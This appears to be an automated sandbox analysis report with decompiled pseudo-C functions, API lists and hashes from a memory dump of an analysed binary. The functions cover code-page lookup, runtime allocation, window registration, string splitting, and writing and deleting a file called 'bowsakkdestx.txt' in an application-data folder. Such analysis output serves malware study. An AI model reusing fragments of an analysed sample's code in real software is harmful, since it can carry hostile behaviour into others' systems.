                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00437A2D(char _a4, intOrPtr _a8) {
                                                                                                    				intOrPtr _t12;
                                                                                                    				short* _t28;
                                                                                                    
                                                                                                    				_t28 = _a4;
                                                                                                    				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
                                                                                                    					if(E00437413(_t28, ?str?) != 0) {
                                                                                                    						return E00423C92(_t28);
                                                                                                    					}
                                                                                                    					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
                                                                                                    						L9:
                                                                                                    						return 0;
                                                                                                    					}
                                                                                                    					return _a4;
                                                                                                    				}
                                                                                                    				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
                                                                                                    					goto L9;
                                                                                                    				}
                                                                                                    				_t12 = _a4;
                                                                                                    				if(_t12 == 0) {
                                                                                                    					return GetACP();
                                                                                                    				}
                                                                                                    				return _t12;
                                                                                                    			}





                                                                                                    0x00437a31
                                                                                                    0x00437a36
                                                                                                    0x00437a5e
                                                                                                    0x00000000
                                                                                                    0x00437a8c
                                                                                                    0x00437a7e
                                                                                                    0x00437aaf
                                                                                                    0x00000000
                                                                                                    0x00437aaf
                                                                                                    0x00000000
                                                                                                    0x00437a80
                                                                                                    0x00437aad
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00437ab3
                                                                                                    0x00437ab8
                                                                                                    0x00437abc
                                                                                                    0x00437abc
                                                                                                    0x00437a85

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wcscmp
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 856254489-711371036
                                                                                                    • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                    • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                                                                                                    • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                                    • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 47%
                                                                                                    			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
                                                                                                    				char _v264;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				char* _t4;
                                                                                                    				void* _t17;
                                                                                                    				CHAR* _t18;
                                                                                                    				void* _t20;
                                                                                                    
                                                                                                    				_t17 = __edx;
                                                                                                    				_t4 =  &_v264;
                                                                                                    				_t18 = __ecx;
                                                                                                    				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
                                                                                                    				if(_t4 >= 0) {
                                                                                                    					PathAppendA( &_v264, "bowsakkdestx.txt");
                                                                                                    					_t20 = E004220B6( &_v264, "w");
                                                                                                    					__eflags = _t20;
                                                                                                    					if(__eflags != 0) {
                                                                                                    						_push(_t20);
                                                                                                    						_push(lstrlenA(_t18));
                                                                                                    						_push(1);
                                                                                                    						_push(_t18);
                                                                                                    						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
                                                                                                    						_push(_t20);
                                                                                                    						E00423A38(__ebx, _t18, _t20, __eflags);
                                                                                                    						return 1;
                                                                                                    					} else {
                                                                                                    						__eflags = 0;
                                                                                                    						return 0;
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    			}











                                                                                                    0x0040c470
                                                                                                    0x0040c479
                                                                                                    0x0040c489
                                                                                                    0x0040c48b
                                                                                                    0x0040c493
                                                                                                    0x0040c4a9
                                                                                                    0x0040c4c0
                                                                                                    0x0040c4c5
                                                                                                    0x0040c4c7
                                                                                                    0x0040c4d1
                                                                                                    0x0040c4d9
                                                                                                    0x0040c4da
                                                                                                    0x0040c4dc
                                                                                                    0x0040c4dd
                                                                                                    0x0040c4e2
                                                                                                    0x0040c4e3
                                                                                                    0x0040c4f2
                                                                                                    0x0040c4c9
                                                                                                    0x0040c4ca
                                                                                                    0x0040c4d0
                                                                                                    0x0040c4d0
                                                                                                    0x0040c495
                                                                                                    0x0040c49b
                                                                                                    0x0040c49b

                                                                                                    APIs
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Path$AppendFolder
                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                    • API String ID: 29327785-2616962270
                                                                                                    • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                    • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                    • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                    • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 90%
                                                                                                    			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                    				char* _v16;
                                                                                                    				char _v28;
                                                                                                    				signed char _v32;
                                                                                                    				void* _t10;
                                                                                                    				void* _t19;
                                                                                                    				intOrPtr* _t22;
                                                                                                    				void* _t24;
                                                                                                    				void* _t25;
                                                                                                    				intOrPtr* _t27;
                                                                                                    
                                                                                                    				_t25 = __edi;
                                                                                                    				_t24 = __edx;
                                                                                                    				_t19 = __ebx;
                                                                                                    				while(1) {
                                                                                                    					_t10 = E00420C62(_t19, _t24, _t25, _a4);
                                                                                                    					if(_t10 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					if(E0042793D(_t10, _a4) == 0) {
                                                                                                    						_push(1);
                                                                                                    						_v16 = "bad allocation";
                                                                                                    						_t22 =  &_v28;
                                                                                                    						E00430D21(_t22,  &_v16);
                                                                                                    						_v28 = 0x4cf748;
                                                                                                    						E00430ECA( &_v28, 0x50793c);
                                                                                                    						asm("int3");
                                                                                                    						_t27 = _t22;
                                                                                                    						 *_t27 = 0x4cf748;
                                                                                                    						E00430D91(_t22);
                                                                                                    						if((_v32 & 0x00000001) != 0) {
                                                                                                    							L00422587(_t27);
                                                                                                    						}
                                                                                                    						return _t27;
                                                                                                    					} else {
                                                                                                    						continue;
                                                                                                    					}
                                                                                                    					L7:
                                                                                                    				}
                                                                                                    				return _t10;
                                                                                                    				goto L7;
                                                                                                    			}












                                                                                                    0x00423b4c
                                                                                                    0x00423b4c
                                                                                                    0x00423b4c
                                                                                                    0x00423b61
                                                                                                    0x00423b64
                                                                                                    0x00423b6c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00423b5f
                                                                                                    0x00423b72
                                                                                                    0x00423b77
                                                                                                    0x00423b7f
                                                                                                    0x00423b82
                                                                                                    0x00423b8f
                                                                                                    0x00423b97
                                                                                                    0x00423b9c
                                                                                                    0x00423ba1
                                                                                                    0x00423ba3
                                                                                                    0x00423ba9
                                                                                                    0x00423bb2
                                                                                                    0x00423bb5
                                                                                                    0x00423bba
                                                                                                    0x00423bbf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00423b5f
                                                                                                    0x00423b71
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 00423B64
                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00540000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                    • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                    • String ID: bad allocation
                                                                                                    • API String ID: 3074076210-2104205924
                                                                                                    • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                    • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                    • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                    • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0041BA10(intOrPtr __ecx) {
                                                                                                    				struct _WNDCLASSEXW _v52;
                                                                                                    
                                                                                                    				_v52.cbSize = 0x30;
                                                                                                    				_v52.style = 3;
                                                                                                    				_v52.lpfnWndProc = E0041BAE0;
                                                                                                    				_v52.cbClsExtra = 0;
                                                                                                    				_v52.cbWndExtra = 0;
                                                                                                    				_v52.hInstance = __ecx;
                                                                                                    				_v52.hIcon = 0;
                                                                                                    				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                                                                    				_v52.hbrBackground = 6;
                                                                                                    				_v52.lpszMenuName = 0;
                                                                                                    				_v52.lpszClassName = L"LPCWSTRszWindowClass";
                                                                                                    				_v52.hIconSm = 0;
                                                                                                    				return RegisterClassExW( &_v52);
                                                                                                    			}




                                                                                                    0x0041ba1d
                                                                                                    0x0041ba24
                                                                                                    0x0041ba2b
                                                                                                    0x0041ba32
                                                                                                    0x0041ba39
                                                                                                    0x0041ba40
                                                                                                    0x0041ba43
                                                                                                    0x0041ba50
                                                                                                    0x0041ba57
                                                                                                    0x0041ba5e
                                                                                                    0x0041ba65
                                                                                                    0x0041ba6c
                                                                                                    0x0041ba7c

                                                                                                    APIs
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                    • RegisterClassExW.USER32 ref: 0041BA73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClassCursorLoadRegister
                                                                                                    • String ID: 0$LPCWSTRszWindowClass
                                                                                                    • API String ID: 1693014935-1496217519
                                                                                                    • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                    • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                    • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                    • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 58%
                                                                                                    			E0040C420() {
                                                                                                    				char _v264;
                                                                                                    				CHAR* _t4;
                                                                                                    
                                                                                                    				_t4 =  &_v264;
                                                                                                    				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
                                                                                                    				if(_t4 >= 0) {
                                                                                                    					PathAppendA( &_v264, "bowsakkdestx.txt");
                                                                                                    					return DeleteFileA( &_v264);
                                                                                                    				}
                                                                                                    				return _t4;
                                                                                                    			}





                                                                                                    0x0040c429
                                                                                                    0x0040c438
                                                                                                    0x0040c440
                                                                                                    0x0040c44e
                                                                                                    0x00000000
                                                                                                    0x0040c45b
                                                                                                    0x0040c464

                                                                                                    APIs
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Path$AppendDeleteFileFolder
                                                                                                    • String ID: bowsakkdestx.txt
                                                                                                    • API String ID: 610490371-2616962270
                                                                                                    • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                    • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                    • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                    • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 50%
                                                                                                    			E00427C2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                    
                                                                                                    				_t15 = __eflags;
                                                                                                    				E00427F51(__ebx, __edx, __edi, __esi, __eflags);
                                                                                                    				_t1 =  &_a4; // 0x423b69
                                                                                                    				E00427FAE(__ebx, __edx, __edi, __esi,  *_t1);
                                                                                                    				E00427CEC(0xff);
                                                                                                    				asm("int3");
                                                                                                    				_push(1);
                                                                                                    				_push(1);
                                                                                                    				_push(0);
                                                                                                    				return E00427E0E(__ebx, __edi, __esi, _t15);
                                                                                                    			}



                                                                                                    0x00427c2e
                                                                                                    0x00427c31
                                                                                                    0x00427c36
                                                                                                    0x00427c39
                                                                                                    0x00427c44
                                                                                                    0x00427c49
                                                                                                    0x00427c4a
                                                                                                    0x00427c4c
                                                                                                    0x00427c4e
                                                                                                    0x00427c58

                                                                                                    APIs
                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00427C31
                                                                                                      • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
                                                                                                      • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82
                                                                                                    • __NMSG_WRITE.LIBCMT ref: 00427C39
                                                                                                      • Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
                                                                                                      • Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE
                                                                                                      • Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6
                                                                                                    • _doexit.LIBCMT ref: 00427C50
                                                                                                      • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                      • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
                                                                                                    • String ID: i;B
                                                                                                    • API String ID: 2447380256-472376889
                                                                                                    • Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                                    • Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
                                                                                                    • Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                                    • Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 67%
                                                                                                    			E0040ECB0(intOrPtr* __ecx, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
                                                                                                    				char _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				char* _v20;
                                                                                                    				char _v32;
                                                                                                    				intOrPtr _v36;
                                                                                                    				char _v40;
                                                                                                    				char _v56;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __ebp;
                                                                                                    				char* _t82;
                                                                                                    				intOrPtr _t85;
                                                                                                    				intOrPtr _t99;
                                                                                                    				intOrPtr* _t112;
                                                                                                    				signed int _t116;
                                                                                                    				intOrPtr* _t122;
                                                                                                    				void* _t123;
                                                                                                    				char* _t129;
                                                                                                    				char* _t132;
                                                                                                    				intOrPtr _t134;
                                                                                                    				intOrPtr* _t136;
                                                                                                    				intOrPtr _t138;
                                                                                                    				void* _t139;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4caa30);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t138;
                                                                                                    				_t139 = _t138 - 0x28;
                                                                                                    				_push(_t132);
                                                                                                    				_t136 = __ecx;
                                                                                                    				_v8 = 0;
                                                                                                    				_t82 = 0;
                                                                                                    				_t112 = 0;
                                                                                                    				_v20 = 0;
                                                                                                    				if( &_v32 != __ecx) {
                                                                                                    					_t82 =  *__ecx;
                                                                                                    					 *__ecx = 0;
                                                                                                    					_t112 =  *((intOrPtr*)(__ecx + 4));
                                                                                                    					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                                                    					_v20 = _t82;
                                                                                                    					 *((intOrPtr*)(__ecx + 8)) = 0;
                                                                                                    				}
                                                                                                    				_v8 = 1;
                                                                                                    				if(_t82 == 0) {
                                                                                                    					L10:
                                                                                                    					if(_a20 == 0) {
                                                                                                    						L39:
                                                                                                    						if(_a24 >= 0x10) {
                                                                                                    							_t82 = L00422587(_a4);
                                                                                                    							_t139 = _t139 + 4;
                                                                                                    						}
                                                                                                    						_a24 = 0xf;
                                                                                                    						_a20 = 0;
                                                                                                    						_a4 = 0;
                                                                                                    						if(_a48 >= 0x10) {
                                                                                                    							_t82 = L00422587(_a28);
                                                                                                    						}
                                                                                                    						 *[fs:0x0] = _v16;
                                                                                                    						return _t82;
                                                                                                    					}
                                                                                                    					_t121 =  >=  ? _a28 :  &_a28;
                                                                                                    					_push( >=  ? _a28 :  &_a28);
                                                                                                    					_t84 =  >=  ? _a4 :  &_a4;
                                                                                                    					_push( >=  ? _a4 :  &_a4);
                                                                                                    					_t82 = E00421B3B();
                                                                                                    					_t129 = _t82;
                                                                                                    					_t139 = _t139 + 8;
                                                                                                    					if(_t129 == 0) {
                                                                                                    						goto L39;
                                                                                                    					}
                                                                                                    					do {
                                                                                                    						_v36 = 0xf;
                                                                                                    						_v40 = 0;
                                                                                                    						_v56 = 0;
                                                                                                    						if( *_t129 != 0) {
                                                                                                    							_t122 = _t129;
                                                                                                    							_t23 = _t122 + 1; // 0x1
                                                                                                    							_t132 = _t23;
                                                                                                    							do {
                                                                                                    								_t85 =  *_t122;
                                                                                                    								_t122 = _t122 + 1;
                                                                                                    							} while (_t85 != 0);
                                                                                                    							_t123 = _t122 - _t132;
                                                                                                    							L18:
                                                                                                    							_push(_t123);
                                                                                                    							_t124 =  &_v56;
                                                                                                    							E004156D0(_t112,  &_v56, _t132, _t129);
                                                                                                    							_v8 = 3;
                                                                                                    							_t134 =  *((intOrPtr*)(_t136 + 4));
                                                                                                    							if( &_v56 >= _t134) {
                                                                                                    								L28:
                                                                                                    								if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
                                                                                                    									E00415230(_t112, _t136, _t134, _t124);
                                                                                                    								}
                                                                                                    								_t132 =  *((intOrPtr*)(_t136 + 4));
                                                                                                    								if(_t132 != 0) {
                                                                                                    									 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
                                                                                                    									 *((intOrPtr*)(_t132 + 0x10)) = 0;
                                                                                                    									 *_t132 = 0;
                                                                                                    									if(_v36 >= 0x10) {
                                                                                                    										 *_t132 = _v56;
                                                                                                    										_v56 = 0;
                                                                                                    									} else {
                                                                                                    										_t95 = _v40 + 1;
                                                                                                    										if(_v40 + 1 != 0) {
                                                                                                    											E004205A0(_t132,  &_v56, _t95);
                                                                                                    											_t139 = _t139 + 0xc;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									 *((intOrPtr*)(_t132 + 0x10)) = _v40;
                                                                                                    									 *((intOrPtr*)(_t132 + 0x14)) = _v36;
                                                                                                    									_v36 = 0xf;
                                                                                                    									_v40 = 0;
                                                                                                    									_v56 = 0;
                                                                                                    								}
                                                                                                    								goto L36;
                                                                                                    							}
                                                                                                    							_t99 =  *_t136;
                                                                                                    							_t124 =  &_v56;
                                                                                                    							if(_t99 > _t124) {
                                                                                                    								goto L28;
                                                                                                    							}
                                                                                                    							_t126 = _t124 - _t99;
                                                                                                    							_t116 = (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t124 - _t99) >> 0x20 >> 2);
                                                                                                    							if(_t134 ==  *((intOrPtr*)(_t136 + 8))) {
                                                                                                    								E00415230(_t116, _t136, _t134, _t126);
                                                                                                    							}
                                                                                                    							_t112 =  *((intOrPtr*)(_t136 + 4));
                                                                                                    							_t132 =  *_t136 + (_t116 + _t116 * 2) * 8;
                                                                                                    							if(_t112 != 0) {
                                                                                                    								 *((intOrPtr*)(_t112 + 0x14)) = 0xf;
                                                                                                    								 *((intOrPtr*)(_t112 + 0x10)) = 0;
                                                                                                    								 *_t112 = 0;
                                                                                                    								if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
                                                                                                    									 *_t112 =  *_t132;
                                                                                                    									 *_t132 = 0;
                                                                                                    								} else {
                                                                                                    									_t107 =  *((intOrPtr*)(_t132 + 0x10)) + 1;
                                                                                                    									if( *((intOrPtr*)(_t132 + 0x10)) + 1 != 0) {
                                                                                                    										E004205A0(_t112, _t132, _t107);
                                                                                                    										_t139 = _t139 + 0xc;
                                                                                                    									}
                                                                                                    								}
                                                                                                    								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t132 + 0x10));
                                                                                                    								 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t132 + 0x14));
                                                                                                    								 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
                                                                                                    								 *((intOrPtr*)(_t132 + 0x10)) = 0;
                                                                                                    								 *_t132 = 0;
                                                                                                    							}
                                                                                                    							goto L36;
                                                                                                    						}
                                                                                                    						_t123 = 0;
                                                                                                    						goto L18;
                                                                                                    						L36:
                                                                                                    						 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 0x18;
                                                                                                    						_v8 = 1;
                                                                                                    						if(_v36 >= 0x10) {
                                                                                                    							L00422587(_v56);
                                                                                                    							_t139 = _t139 + 4;
                                                                                                    						}
                                                                                                    						_t89 =  >=  ? _a28 :  &_a28;
                                                                                                    						_push( >=  ? _a28 :  &_a28);
                                                                                                    						_push(0);
                                                                                                    						_t82 = E00421B3B();
                                                                                                    						_t129 = _t82;
                                                                                                    						_t139 = _t139 + 8;
                                                                                                    					} while (_t129 != 0);
                                                                                                    					goto L39;
                                                                                                    				}
                                                                                                    				_t132 = _t82;
                                                                                                    				if(_t82 == _t112) {
                                                                                                    					L9:
                                                                                                    					_t82 = L00422587(_t82);
                                                                                                    					_t139 = _t139 + 4;
                                                                                                    					goto L10;
                                                                                                    				} else {
                                                                                                    					do {
                                                                                                    						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
                                                                                                    							L00422587( *_t132);
                                                                                                    							_t139 = _t139 + 4;
                                                                                                    						}
                                                                                                    						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
                                                                                                    						 *((intOrPtr*)(_t132 + 0x10)) = 0;
                                                                                                    						 *_t132 = 0;
                                                                                                    						_t132 = _t132 + 0x18;
                                                                                                    					} while (_t132 != _t112);
                                                                                                    					_t82 = _v20;
                                                                                                    					goto L9;
                                                                                                    				}
                                                                                                    			}


























                                                                                                    0x0040ecb3
                                                                                                    0x0040ecb5
                                                                                                    0x0040ecc0
                                                                                                    0x0040ecc1
                                                                                                    0x0040ecc8
                                                                                                    0x0040eccd
                                                                                                    0x0040ecce
                                                                                                    0x0040ecd0
                                                                                                    0x0040ecd7
                                                                                                    0x0040ecd9
                                                                                                    0x0040ecdb
                                                                                                    0x0040ece3
                                                                                                    0x0040ece5
                                                                                                    0x0040ece7
                                                                                                    0x0040ece9
                                                                                                    0x0040ecec
                                                                                                    0x0040ecf3
                                                                                                    0x0040ecf6
                                                                                                    0x0040ecf6
                                                                                                    0x0040ecfd
                                                                                                    0x0040ed03
                                                                                                    0x0040ed44
                                                                                                    0x0040ed48
                                                                                                    0x0040eefc
                                                                                                    0x0040ef00
                                                                                                    0x0040ef05
                                                                                                    0x0040ef0a
                                                                                                    0x0040ef0a
                                                                                                    0x0040ef11
                                                                                                    0x0040ef18
                                                                                                    0x0040ef1f
                                                                                                    0x0040ef23
                                                                                                    0x0040ef28
                                                                                                    0x0040ef2d
                                                                                                    0x0040ef35
                                                                                                    0x0040ef40
                                                                                                    0x0040ef40
                                                                                                    0x0040ed58
                                                                                                    0x0040ed60
                                                                                                    0x0040ed61
                                                                                                    0x0040ed65
                                                                                                    0x0040ed66
